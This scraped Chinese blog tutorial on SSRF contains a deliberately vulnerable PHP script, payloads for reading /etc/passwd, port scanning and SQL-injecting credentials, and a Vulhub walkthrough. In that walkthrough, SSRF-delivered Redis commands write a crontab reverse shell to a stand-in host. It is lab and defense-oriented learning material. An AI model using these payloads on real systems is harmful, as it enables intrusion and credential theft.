自己做电影网站怎么赚钱北京互联网公司招聘信息

bicheng/2025/10/13 20:16:35/文章来源:
自己做电影网站怎么赚钱,北京互联网公司招聘信息,开心消消乐官方网站开发公司,往公众号里放网站怎么做服务端请求伪造#xff0c;其实就是攻击者构造恶意请求#xff0c;服务端发起恶意请求#xff0c;如果服务端不对用户传递的参数进行严格的过滤和限制#xff0c;就可能导致服务端请求伪造 上面是百度识图#xff0c;我们可以传递图片地址#xff0c;百度识图向图片发起…服务端请求伪造其实就是攻击者构造恶意请求服务端发起恶意请求如果服务端不对用户传递的参数进行严格的过滤和限制就可能导致服务端请求伪造 上面是百度识图我们可以传递图片地址百度识图向图片发起请求如果请求是恶意的并且没有进行过滤和验证就可能导致服务端请求伪造 SSRF漏洞代码示例 ?php if(isset($_REQUEST[url])){$link $_REQUEST[url];$fileName ./curled/.time()..txt;$curlObj curl_init($link);$fp fopen($fileName,w);curl_setopt($curlObj,CURLOPT_FILE,$fp);curl_setopt($curlObj,CURLOPT_HEADER,0);curl_setopt($curlObj,CURLOPT_FOLLOWLOCATION,TRUE);curl_exec($curlObj);curl_close($curlObj);fclose($fp);if(getimagesize($fileName)){header(Content-Type:image/png);}$fp fopen($fileName,r);$result fread($fp,filesize($fileName));fclose($fp);echo $result; }else{echo ?url[url]; } ? SSRF漏洞原理 服务端接受客户端的url地址并且服务端发送该URL请求 对用户输入的url过滤不严导致任意url输入 没有对响应的结果进行响应直接输出 SSRF危害 端口扫描 内网指纹识别 攻击内网应用 读取本地文件 SSRF利用 文件访问 ?urlhttp://www.baidu.com ?urlhttp://www.baidu.com/img/bd_logo.png ?urlhttp://www.baidu.com/robots.txt 端口扫描 ?urlhttp://127.0.0.1:80 ?urlhttp://127.0.0.1:3306 ?urldict://127.0.0.1:3306 ?urlhttp://10.10.10.1:22 ?urlhttp://10.10.10.1:6379 读取本地文件 ?urlfile:///c:/windows/system32/drivers/etc/hosts ?urlfile:///etc/passwd ?urlfile:/c:/www/ssrf/ssrf_curl.php 内网指纹识别 ?urlhttp://127.0.0.1/phpmyadmin/readme 攻击内网web应用 ?urlhttp://127.0.0.1/cms/show.php? id-33/*A*/union/*J*/select/*E*/1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15/*S*/from/*T*/cms_ users ?urlhttp://127.0.0.1/cms/show.php? id-33%25%32%30union%25%32%30select%25%32%301,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15%25%32 %30from%25%32%30cms_users SSRF防御 过滤输入 限制协议仅允许 http 或 https 协议 限制IP避免应用被用来获取内网数据攻击内网 限制端口限制请求端口为常用端口。 过滤输出 过滤返回信息只要不符合要求的全部过滤 统一错误信息让攻击无法对内网信息进行判断。 SSRF 挖掘 分享 转码服务 在线翻译 图片加载与下载 图片、文章收藏功能 未公开的API 实现 SSRF练习 vulhub ssrf漏洞复现 拉取docker环境拉取需要较长时间 访问http://192.168.142.151:7001/console/login/LoginForm.jsp这是一个登录界面但是现在不需要用这个用这个只是测试环境是否搭建成功 ​ 根据提示访问http://your-ip:7001/uddiexplorer/ burp抓包 修改访问127.0.0.1的80端口发现不能访问 先使用dnslog看是否存在ssrf漏洞 可以看到确实存在ssrf 首先明确一点通过ssrf探测内网中的redis服务器docker环境的网段一般是172.*我们的目的是通过ssrf攻击内网的redis服务器如图 ip a查看IP 先用ssrf进行内网端口扫描 可访问的端口将会得到错误一般是返回status code如下图如果访问的非http协议则会返回did not have a valid SOAP content-type。修改为一个不存在的端口将会返回could not connect over HTTP to server。   172.17.0.1 172.18.0.1 172.19.0.1 172.20.0.1 访问.2发现只有172.20.0.2访问他的其他端口 发现redis服务开启 发送三条redis命令将弹shell脚本写入/etc/crontab   set 1 \n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c sh -i /dev/tcp/evil/21 01\n\n\n\n config set dir /etc/ config set dbfilename crontab save 进行url编码 set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave 注意换行符是“\r\n”也就是“%0D%0A”。 可以看到计划任务提权成功了这个漏洞运用了服务端请求伪造计划任务还利用了CRLF即通过换行符来执行多条命令 ctfhub 302跳转bypass 先看一下是否有ssrf漏洞,题目说flag在127.0.0.1的flag.php里127.0.0.1不行试了一下localhost可以 内网访问 直接访问127.0.0.1/flag.php就行 伪协议读取文件 URL伪协议有如下这些 file:/// dict:// sftp:// ldap:// tftp:// gopher:// 端口扫描 提示端口在8000到9000使用bp的intuder模块进行扫描得到8828端口 访问即可 URLbypass 这题主要考的是url地址解析简单来说就是http://www.baidu.com192.168.0.1/与http://192.168.0.1请求的都是192.168.0.1的内容。 因此这个题目要求url must startwith “http://notfound.ctfhub.com” 我们直接构造?urlhttp://notfound.ctfhub.com127.0.0.1/flag.php 成功得到flag。 数字IP bypass 直接访问发现被禁止想到可以通过进制转换方式绕过 127.0.0.1进行十六进制编码0x7F000001 DNS重绑定 dns重绑定的原理题目的附件已经给了这里需要用一个dns重绑定的网站 rbndr.us dns rebinding service (cmpxchg8b.com) POST请求 周末再写

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/90511.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

.net 网站模板 下载织梦cms安装教程

华为儿童手表 5X 不仅是孩子的好玩伴,也是家长的好帮手。全能形态让小小手表探索更多,高清双摄记录美好,离线定位随时掌握,绿色纯净守护成长,让孩子享受科技带来的安全与乐趣。

怎么建设一个手机网站WordPress是前端还是后端

1.准备redis的配置文件 从上一篇运行MySQL容器我们知道,需要给容器挂载数据卷,来持久化数据和配置,相应的redis也不例外。这里我们以redis6.0.8为例来实际说明下。 1.1 查找redis的配置文件redis.conf 下面这个网址有各种版本的配置文件供…

怎么建网站快捷方式网站关键词掉了

1 简介文章主要内容包括:Java 持久层技术/框架简单介绍不同场景/框架下易导致 SQL 注入的写法如何避免和修复 SQL 注入2 JDBC介绍JDBC:全称 Java Database Connectivity是 Java 访问数据库的 API,不依赖于特定数据库 ( database-independent …

泰州模板建站代理本地电脑做网站

post请求参数全大写后台接不到参数 开发过程中,我们一般都习惯用驼峰命名法,但是特殊情况要求请求参数全大写(或者首字母大写),测试验证的时候发现,接收不到请求参数。 前端请求传递: 服务端接…

建设银行流水账网站查询云开发工程师

前言 之前业务系统中验证码一直是由后端返回base64与一个验证码的字符串来实现的,想了下,前端其实可以直接canvas实现,减轻服务器压力。 实现 子组件,允许自定义图片尺寸(默认尺寸为100 * 40)与验证码刷新时间(默认时间为60秒)…

怎样在网站做视频链接本地安装网站无法连接数据库

什么是索引 索引是帮助MySQL高效获取数据的数据结构。查看索引可以使用SHOW INDEX或EXPLAIN语句。 索引的工作原理 索引就像书的目录一样,当要查找书中的内容时,首先查看目录,通过目录可以快速定位内容的位置。 MySQL索引的工作方式也是一样的。当SQL语句执行查询时,优化器…

销售网站免费做导航网站制作教程

1. 问题背景 1.1 域名解析异常 近期开发的一个功能,需要在k8s集群容器环境中调用公司内部api,api提供了内网域名,解析内网域名异常导致请求超时,因此梳理了下DNS的知识点。 可以先看到下面👇这段配置,修…

有实力的网站建设公司简述网站开发的几个阶段

CSP-202109-2-非零段划分 【70分思路-暴力枚举】 这段代码的目的是在给定一个由自然数(非负整数)组成的数组后,通过选择一个适当的正整数 p,将数组中所有小于 p 的数变为 0,从而使得数组中非零段的数量达到最大。这里…

在阿里巴巴网站上怎么做贸易网站建设要规避的

根据月计划,为了要考虑把产品代码吃透。先对于计算几何,图像处理,测量学基础,slam进行 当然,也要把ue继续进行着。ue的rpg和底层渲染。收集下虚幻商城的免费资源,万一以后做独立游戏用得到。其他的可以暂时…

如何逐步提升网站权重外贸公司是什么类型的企业

一、源码特点 smm VUE电影售票管理系统是一套完善的完整信息管理类型系统,结合SSM框架和VUE、redis完成本系统,对理解vue java编程开发语言有帮助系统采用ssm框架(MVC模式开发),系 统具有完整的源代码和数据库&#…

网站开发人员岗位分布说明展示型网站建设流程方案

获取国内城市编码API接口 一、获取国内城市编码接口二、使用步骤1、接口2、请求参数 三、 案例和demo 一、获取国内城市编码接口 一款免费的帮助你获取取国内城市编码的接口 二、使用步骤 1、接口 重要提示:建议使用https协议,当https协议无法使用时再尝试使用http协议 请求…

重庆建设厂网站手机网站搭建公司

问题描述 在windows下,python在安装一些包的时候,常常会碰到time out的情况,如下图所示。不管再重试几次都是如此,这时候该怎么办呢? 解决方案 方案一:更换安装源(推荐使用豆瓣源&#xff09…

vrview wordpress动态ip做网站影响seo吗

文章目录 题目描述问题分析程序代码 题目描述 原题链接 小扣当前位于魔塔游戏第一层,共有 N 个房间,编号为 0 ~ N-1。每个房间的补血道具/怪物对于血量影响记于数组 nums,其中正数表示道具补血数值,即血量增加对应数值&#xff1b…

郑州做手机网站建设涵江网站建设

手机几乎是每个成年人人手一个以上,市场非常大,加之产品更新迭代速度快,每年都会推出多个型号、造型等,因此对高收入群体或爱机人群来说,新手机往往一年或二年时间就会换,或者直接购买当备用机等。 每个城…

浙江省建设银行纪检官方网站海口网站建设服务

工具介绍:matplotlib 是Python编程语言的一个绘图库及其数值数学扩展 NumPy。它为利用通用的图形用户界面工具包,如Tkinter, wxPython, Qt或GTK向应用程序嵌入式绘图提供了面向对象的应用程序接口(API)。还有一个基于状态机(如开放图形库OpenGL)的程序py…

要做网站工商注册需要准备什么材料

其实现在的孩子从上初中开始,他们的学习压力就已经很大了,繁重的功课让他们经常用眼过度,导致早早就戴上小眼镜。所以要想孩子拥有一个良好的视力健康,不仅要从日常的坐姿、用眼习惯开始纠正、培养,夜晚学习时的那一盏…

郑州做网站的公司哪些广告公司起名字大全

1.用jmeter怎么进行测试? 使用JMeter进行测试的步骤如下: 启动JMeter,右键点击测试计划,选择添加->Threads(Users)->线程组,在线程组下创建请求。在请求中添加HTTP请求信息头,右键点击HTTP请求&…

互联网网站模板wordpress html5 支持

【试剂详情】 英文名称 mPEG-PA,mPEG-Propionic acid, Methoxy PEG PA, Methoxy PEG Propionic acid 中文名称 聚乙二醇单甲醚丙酸, 甲氧基-聚乙二醇-丙酸 外观性状 由分子量决定,固体或者液体 分子量 400&…

网站公告栏怎么做国外界面设计网站

本文主要内容:掌握Pointcut的12种用法。 Aop相关阅读 阅读本文之前,需要先掌握下面3篇文章内容,不然会比较吃力。 Spring系列第15篇:代理详解(java动态代理&CGLIB代理)Spring系列第30篇:jdk动态代理…